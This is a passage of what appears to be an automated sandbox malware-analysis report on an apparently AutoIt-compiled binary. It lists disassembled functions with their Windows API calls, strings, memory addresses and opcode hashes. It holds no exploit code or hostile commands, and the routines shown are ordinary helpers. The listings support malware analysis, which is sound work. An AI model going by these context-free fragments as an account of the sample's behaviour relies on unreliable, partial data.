                                          • Instruction ID: 5f37b3aff1e7900bfa6e0e655dfd81a9e68e53b76491696d82c1946bea481cfd
                                          • Opcode Fuzzy Hash: 6e87c67187a6bba7d59bf6ad006b055ee0f7e3ad2d09ace4feffafa7a8550328
                                          • Instruction Fuzzy Hash: 8911CE34200305ABDB20AF64ED46FAEB374EF04320F109527EA11B7391DB72A80587A5
                                          Function 00E292E7 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 52windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,000001A2,000000FF,?), ref: 00E29355
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: 95ed9a9eea7f8815aeb4271a20c567f57696f59da8cd1d1e0b6cbb0a0923e9a7
                                          • Instruction ID: 372d3c1948f2348f172ba820a10cfe126d221cdc1227af84dc7ccad4709ff7e8
                                          • Opcode Fuzzy Hash: 95ed9a9eea7f8815aeb4271a20c567f57696f59da8cd1d1e0b6cbb0a0923e9a7
                                          • Instruction Fuzzy Hash: 6F019271A05225AB8B05EB64DC91CFE77A9FF06320B142659F832673D2DB3159088770
                                          Function 00E291DF Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,00000180,00000000,?), ref: 00E2924D
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: a252c35833b03a46e6886a350343b4180fcf2a77654330b950ec7607920c971f
                                          • Instruction ID: 9e45666e0f43b1678757b6296d966c772013d738fc330457f36cced4ba096083
                                          • Opcode Fuzzy Hash: a252c35833b03a46e6886a350343b4180fcf2a77654330b950ec7607920c971f
                                          • Instruction Fuzzy Hash: BB018871A41215BBCB19E7A0E992EFF73ACDF05300F142055B51677292EA116E0C9671
                                          Function 00E29264 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49windowCOMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00DD7F41: _memmove.LIBCMT ref: 00DD7F82
                                            • Part of subcall function 00E2B0C4: GetClassNameW.USER32(?,?,000000FF), ref: 00E2B0E7
                                          • SendMessageW.USER32(?,00000182,?,00000000), ref: 00E292D0
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassMessageNameSend_memmove
                                          • String ID: ComboBox$ListBox
                                          • API String ID: 372448540-1403004172
                                          • Opcode ID: fc4e5a08d2598df24f6b7b2dc1f2cc40cf932899895a33d4ee93fe9bd044e0a5
                                          • Instruction ID: 7d83f8f6c67d7eaec3f5a7836bf9da289c3f5278f83e27961fa0b80653c39376
                                          • Opcode Fuzzy Hash: fc4e5a08d2598df24f6b7b2dc1f2cc40cf932899895a33d4ee93fe9bd044e0a5
                                          • Instruction Fuzzy Hash: 9201A772A41215B7CB15E7A0E982EFF77ACDF11300F242116B81673292DA115E0C9271
                                          Function 00DF6DAE Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 45COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: __calloc_crt
                                          • String ID: @R
                                          • API String ID: 3494438863-2347139750
                                          • Opcode ID: 4f1eb1cf665194c60e35c77da92ec954da8e5dcc9975612c3224533742ed3667
                                          • Instruction ID: f739368f33b3246e25c6245bf6a56cca591b2339195ad019db57e27ef3894f8d
                                          • Opcode Fuzzy Hash: 4f1eb1cf665194c60e35c77da92ec954da8e5dcc9975612c3224533742ed3667
                                          • Instruction Fuzzy Hash: D0F0627230861AEFF724DF2ABD016713795EB40760B168527F304EA6A0EB30C88597B1
                                          Function 00E351CA Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 29COMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: ClassName_wcscmp
                                          • String ID: #32770
                                          • API String ID: 2292705959-463685578
                                          • Opcode ID: 17b2acc93ea40498a468a5d10c005c8df3977051f8bf44f8b2818b62385203ab
                                          • Instruction ID: 6cfd321b23496fec8f709fa0871ad0ba267dbedb9491094b9794094ab7257f3d
                                          • Opcode Fuzzy Hash: 17b2acc93ea40498a468a5d10c005c8df3977051f8bf44f8b2818b62385203ab
                                          • Instruction Fuzzy Hash: F5E0D17350432D1BE720A6959C49FA7F7ACEB45771F010167FD14E3150E560994987E1
                                          Function 00E281BC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 22windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • MessageBoxW.USER32(00000000,Error allocating memory.,AutoIt,00000010), ref: 00E281CA
                                            • Part of subcall function 00DF3598: _doexit.LIBCMT ref: 00DF35A2
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: Message_doexit
                                          • String ID: AutoIt$Error allocating memory.
                                          • API String ID: 1993061046-4017498283
                                          • Opcode ID: 4703f3a2c283d686059b8526515a1a235f5473ed6d789e6b33546272b9e6a930
                                          • Instruction ID: b44a58e0f096f5e5c9026933840e902b00545efa37888e0ac5284ecbacaef092
                                          • Opcode Fuzzy Hash: 4703f3a2c283d686059b8526515a1a235f5473ed6d789e6b33546272b9e6a930
                                          • Instruction Fuzzy Hash: 6FD05B323C631C36D21532A57D07FDA76488B15B56F054416FB0C755D3CDD1999142F9
                                          Function 00E0B511 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                          Download Yara Rule
                                          APIs
                                            • Part of subcall function 00E0B564: _memset.LIBCMT ref: 00E0B571
                                            • Part of subcall function 00DF0B84: InitializeCriticalSectionAndSpinCount.KERNEL32(00E95158,00000000,00E95144,00E0B540,?,?,?,00DD100A), ref: 00DF0B89
                                          • IsDebuggerPresent.KERNEL32(?,?,?,00DD100A), ref: 00E0B544
                                          • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,00DD100A), ref: 00E0B553
                                          Strings
                                          • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 00E0B54E
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString_memset
                                          • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                          • API String ID: 3158253471-631824599
                                          • Opcode ID: 9d87ab76386c9f69edc8b5779216078b5921c21eb32a2a9ff7718890266165d6
                                          • Instruction ID: 56c1fa03944ae862c11bd56e82b33bf1de890285475e7d71c9517a460477eaee
                                          • Opcode Fuzzy Hash: 9d87ab76386c9f69edc8b5779216078b5921c21eb32a2a9ff7718890266165d6
                                          • Instruction Fuzzy Hash: D5E06DB02007118FD725DF29D8043427BE4FB00745F00C96EE586E37A1EBB4D448CB61
                                          Function 00E55BEB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                          Download Yara Rule
                                          APIs
                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 00E55BF5
                                          • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00E55C08
                                            • Part of subcall function 00E354E6: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00E3555E
                                          Strings
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.2049756321.0000000000DD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00DD0000, based on PE: true
                                          • Associated: 00000000.00000002.2049738517.0000000000DD0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E85000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E8F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000E9E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049756321.0000000000EE2000.00000040.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049892477.0000000000EE8000.00000080.00000001.01000000.00000003.sdmpDownload File
                                          • Associated: 00000000.00000002.2049909370.0000000000EE9000.00000004.00000001.01000000.00000003.sdmpDownload File
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_dd0000_toIuQILmr1.jbxd
                                          Similarity
                                          • API ID: FindMessagePostSleepWindow
                                          • String ID: Shell_TrayWnd
                                          • API String ID: 529655941-2988720461
                                          • Opcode ID: 0f9d8b12e7faee13cc34090502e966bfac4b0138aa1ce5a4d0b547e0739aded7
                                          • Instruction ID: c70396ea7a4f3bb1848d9d3b11365ceb25b640a808d57b7ce852aa7c94feca31
                                          • Opcode Fuzzy Hash: 0f9d8b12e7faee13cc34090502e966bfac4b0138aa1ce5a4d0b547e0739aded7
                                          • Instruction Fuzzy Hash: C5D0C932398311BBE778BB71AC5FF976A54AB40B52F140C35B75ABA1D0D9E45804C690